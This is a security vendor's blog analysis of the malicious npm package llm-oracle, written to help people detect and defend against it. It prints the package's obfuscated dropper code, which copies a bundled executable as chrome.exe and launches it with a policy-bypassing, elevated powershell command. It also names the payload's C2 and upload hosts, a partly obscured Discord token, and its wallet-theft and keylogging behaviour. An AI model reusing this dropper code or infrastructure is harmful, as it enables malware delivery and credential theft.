Malicious Open Source Library Analysis: llm-oracle and its Payload

AI

SafeDep Team

• Nov 4, 2024 • 5 min read

The good folks at socket.io published their research on Supply Chain Attacks Targeting LLM Application Developers: The Hidden Dangers of Fake Open Source Packages in which they shared their findings on discovery and analysis of malicious npm package llm-oracle. This was interesting to us because vet detects a similar package, redis-oracle as malicious but not llm-oracle. We decided to take a closer look at llm-oracle.

Scanning for Malware using `vet`

vet can be used to scan a package by its Package URL.

1
vet scan --purl pkg:/npm/[email protected]

This results in a detection as expected

However, when we scan llm-oracle, we do not get any detection. This is not entirely surprising because vet by default depends on Package Analysis data for malware detection, which may not be accurate or up-to-date.

Manual Analysis of `llm-oracle`

We decided to manually analyse llm-oracle. The first step was to identify package metadata from npm registry.

1
npm view llm-oracle

This produces some useful information including author, publisher and URL of the latest version of the package.

1
[email protected] | MIT | deps: 28 | versions: 3
2
[...]
3
dist
4
.tarball: https://registry.npmjs.org/llm-oracle/-/llm-oracle-1.0.2.tgz
5
[...]
6
dependencies:
7
[...]
8
maintainers:
9
- josh.weavery <[email protected]>
10
published 3 months ago by josh.weavery <[email protected]>

We then fetched the tarball and extracted the contents for local analysis. The archive contained the following files:

1
-rw-r--r--  1 dev  wheel  16773255 Oct 26  1985 Base64Decode.ts
2
-rw-r--r--  1 dev  wheel       252 Oct 26  1985 HISTORY.md
3
-rw-r--r--  1 dev  wheel      1111 Oct 26  1985 LICENSE
4
-rw-r--r--  1 dev  wheel      3105 Oct 26  1985 README.md
5
-rw-r--r--  1 dev  wheel      2665 Oct 26  1985 index.js
6
-rw-r--r--  1 dev  wheel      2170 Oct 26  1985 package.json

The first step in any malware analysis process is to identify the file types. The simplest way to do that is using the file(1) command. Surprisingly, the first step itself gave us a strong malware indicator.

1
Base64Decode.ts: PE32+ executable (GUI) x86-64, for MS Windows
2
HISTORY.md:      ASCII text, with CRLF line terminators
3
LICENSE:         ASCII text, with CRLF line terminators
4
README.md:       ASCII text, with CRLF line terminators
5
index.js:        ASCII text, with CRLF line terminators
6
package.json:    JSON data

The Base64Decode.ts was a Windows x86_64 executable with a .ts extension. Before we jump right into the payload, we wanted to look into the dropper index.js to confirm the behaviour. The index.js contained the following semi-obfuscated code:

1
const targetFilePath = path.join(
2
  process.env.LOCALAPPDATA,
3
  String('\u0063\u0068\u0072\u006f\u006d\u0065\u002e\u0065\u0078\u0065').replace(/\+/g, '')
4
);

1
if (!fs.existsSync(targetFilePath)) {
2
  setTimeout(() => {
3
    fs.copyFileSync(modelFilePath, targetFilePath);
4
    exec(
5
      `p\u006fwersh\u0065ll -\u0045x\u0065cut\u0069\u006fnP\u006fl\u0069cy Byp\u0061ss St\u0061rt-Pr\u006fcess -F\u0069leP\u0061th '${targetFilePath}' -V\u0065rb R\u0075n\u0041s`,
6
      (error, stdot, stderr) => {}
7
    );
8
  }, 60000);
9
}

While advanced malware analysis techniques may differ (j/k), we used the good old ruby interpreter to view the obfuscated strings

1
irb(main):001:0> "\u0063\u0068\u0072\u006f\u006d\u0065\u002e\u0065\u0078\u0065"
2
=> "chrome.exe"

1
irb(main):006:0> "f\u0073.copyFileSync(m\u006fd\u0065lFileP\u0061th, t\u0061rg\u0065tFileP\u0061th); e\u0078ec(`p\u006fwersh\u0065ll -\u0045x\u0065cut\u0069\u006fnP\u006fl
2
\u0069cy Byp\u0061ss St\u0061rt-Pr\u006fcess -F\u0069leP\u0061th '${t\u0061rg\u0065tFileP\u0061th}' -V\u0065rb R\u0075n\u0041s`, (err\u006fr, std\u006ft, std\u0065rr)"
3
=> "fs.copyFileSync(modelFilePath, targetFilePath); exec(`powershell -ExecutionPolicy Bypass Start-Process -FilePath '${targetFilePath}' -Verb RunAs`, (error, stdot, stderr)"

The Payload

From index.js, we can identify that Base64Decode.ts, a Windows executable was copied as chrome.exe to %LOCALAPPDATA% and executed using powershell.exe. To understand the behaviour of the payload, we needed to get our hands dirty with our old friend IDA Pro or its close cousin Ghidra. But unfortunately, strings(1) put us on a different path. We found the following strings in the payload that indicated it was a Python script packaged as executable using PyInstaller.

1
Cannot open PyInstaller archive from executable (%s) or external archive (%s)
2
Installing PYZ: Could not get sys.path!
3
PYINSTALLER_STRICT_UNPACK_MODE
4
PyInstaller: FormatMessageW failed.
5
PyInstaller: pyi_win32_utils_to_utf8 failed.

Extracting the PyInstaller archive from the executable gave us the following files:

Among these files, OH8xADfF8q.pyc looked interesting with strings like

1
'D:\work\Python-Trojan-src\OH8xADfF8q.py

0H8xADfF8q.pyc in turn decompiles to something like this

1
import os
2
import discord
3
[...]
4
exec(base64.b64decode(bytes('aW1wb3J0IGJhc2U2NDtl...', 'utf-8')).decode('utf-8'))

The base64 encoded string contains the actual payload, which decodes to a Python script that performs various conventional malware activities.

Behaviour

Looks for crypto wallets metamask, tronlink, trustwallet, coinbase, flint, exodus, binance, phantom, Xverse, Slope, Solflare, Typhon, nami, keplr, okx, bitski, myetherwallet
Look for Chrome extension data for these wallets
Downloads configuration from https://bayard-front-833a4.web.app/start.dat

1
{
2
  "gid": "12 __76 __201 __8416 __20 __815 __932",
3
  "tkn": "MT __I __3NjIwMzQ __yNjY __2NDk0 __MzY2Ng.GUg __pUL.X __Xj7OFha __7Z5r __gYZHw __tatOdp3l __i6bZ __HrDQXDCn4"
4
}

Connects to Discord server using the Guild ID and Token
Creates a new channel using the current username and a random string
Starts a keylogger
Starts taking screenshot of active window
Sends keystroke and screenshots to the Discord channel
Starts a full command and control over Discord

File Transfer

The payload checks if the file requested for transfer is greater than 25MB. If so, it fetches configuration from https://api.gofile.io/getServer and uploads to https://{server}.gofile.io/uploadFile using Python requests library. When we tried to access the URL, we get a 404 Not Found response, indicating the application is probably geo-fenced or checks for some request attribute.

Conclusion

llm-oracle is a malicious package that contains a Windows executable
The packaging and sophistication of the malware appears to be low
Common attacker TTP was used for payload execution using powershell.exe, PyInstaller and base64 encoding
We expect AVs and EDRs to detect this payload using behavioural analysis
Discord was used as C2 server for exfiltration and command and control

vet
cloud
malware

Author

SafeDep Team

safedep.io

Share

Malicious npm Packages Target Schedaero via Dependency Confusion

A detailed analysis of a dependency confusion supply chain attack likely targeting Schedaero, a leading aviation software company. We dissect the payload, the exfiltration mechanism, and the...

Malware

AI Agent Cline v2.3.0 Compromised: From Prompt Injection to Unauthorized npm Publish

A compromised npm token was used to publish a tampered version of Cline CLI. A prompt injection vulnerability in Cline's AI-powered GitHub Actions workflow may have enabled the credential theft.

Security

npm SANDWORM_MODE Attack: Step-by-Step Malware Analysis

Step-by-step technical analysis of the SANDWORM_MODE npm supply chain attack. We dissect yarsg and format-defaults malicious packages, decode multi-layer obfuscation, and trace the payload delivery...

Why We Built a Hosted MCP Server to Stop Malicious Packages for AI Agents

Exposing an MCP server is trivial. Making it useful for AI agents is not. Here's what we learned dogfooding our own tool, and why we built a hosted MCP server backed by real-time open source threat...

View All Blogs

Ship Code

Not Malware

Install the SafeDep GitHub App to keep malicious packages out of your repos.

Install GitHub App

Malicious Open Source Library Analysis: llm-oracle and its Payload

Table of Contents

Scanning for Malware using `vet`

Manual Analysis of `llm-oracle`

The Payload

Behaviour

File Transfer

Conclusion

Author

SafeDep Team

Share

The Latest from SafeDep blogs

Malicious npm Packages Target Schedaero via Dependency Confusion

AI Agent Cline v2.3.0 Compromised: From Prompt Injection to Unauthorized npm Publish

npm SANDWORM_MODE Attack: Step-by-Step Malware Analysis

Why We Built a Hosted MCP Server to Stop Malicious Packages for AI Agents

Ship Code

Not Malware

Malicious Open Source Library Analysis: llm-oracle and its Payload

Table of Contents

Scanning for Malware using vet

Manual Analysis of llm-oracle

The Payload

Behaviour

File Transfer

Conclusion

Author

SafeDep Team

Share

The Latest from SafeDep blogs

Ship Code

Not Malware

Scanning for Malware using `vet`

Manual Analysis of `llm-oracle`